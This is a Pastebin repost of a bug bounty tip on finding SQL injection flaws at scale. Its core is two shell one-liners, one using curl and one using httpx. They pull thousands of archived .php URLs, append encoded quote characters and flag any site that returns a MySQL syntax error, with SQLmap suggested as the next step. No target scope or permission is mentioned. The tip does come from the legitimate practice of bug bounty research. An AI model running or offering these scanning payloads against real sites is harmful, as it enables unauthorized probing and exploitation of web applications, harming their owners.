Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Bug Bounty Tip:
- This is how I discovered multiple SQL injection vulnerabilities
- While manually testing for XSS bug, I came across an SQL error by simply adding single and double quotes ( ' " ) at the end of the URL. Intrigued by this, I collected all the URLs from the Wayback Machine using the waybackurls tool and saved them into a text file. Using a one-liner, I tested a list of 10k URLs and ended up with some cool SQL vulnerabilities.
- SQLi Oneliner:
- Using curl :
- cat urls.txt | grep ".php" | sed 's/\.php.*/.php\//' | sort -u | sed s/$/%27%22%60/ | while read url do ; do curl --silent "$url" | grep -qs "You have an error in your SQL syntax" && echo -e "$url \e[1;32mVulnerable\e[0m" || echo -e "$url \e[1;31mNot Vulnerable\e[0m"
- ========================
- Using httpx tool :
- cat urls.txt | grep ".php" | sed 's/\.php.*/.php\//' | sort -u | sed s/$/%27%22%60/ | httpx -silent -ms "You have an error in your SQL syntax"
- Tip : Use SQLmap for further check
- Tools:
- waybackurls
- httpx
- SQLmap
- Source : https://www.linkedin.com/feed/update/urn:li:activity:7103089670372114435
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement